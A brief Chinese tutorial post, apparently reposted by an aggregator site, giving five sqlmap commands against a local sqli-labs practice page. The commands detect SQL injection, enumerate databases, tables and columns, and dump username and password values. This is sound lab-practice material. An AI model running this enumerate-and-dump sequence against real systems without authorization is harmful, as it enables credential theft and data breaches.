sqlmap 扫描注入漏洞
Posted Python研究者
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqlmap 扫描注入漏洞相关的知识,希望对你有一定的参考价值。
1 1、检测是否存在漏洞: 2 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 3 2、获取数据库信息: 4 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 --dbs 5 3、数据库表信息: 6 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 -D security --tables 7 4、表中字段信息 8 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 -D security -T users --columns 9 5、字段值数据 10 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 -D security -T users -C "username,password" --dump
以上是关于sqlmap 扫描注入漏洞的主要内容,如果未能解决你的问题,请参考以下文章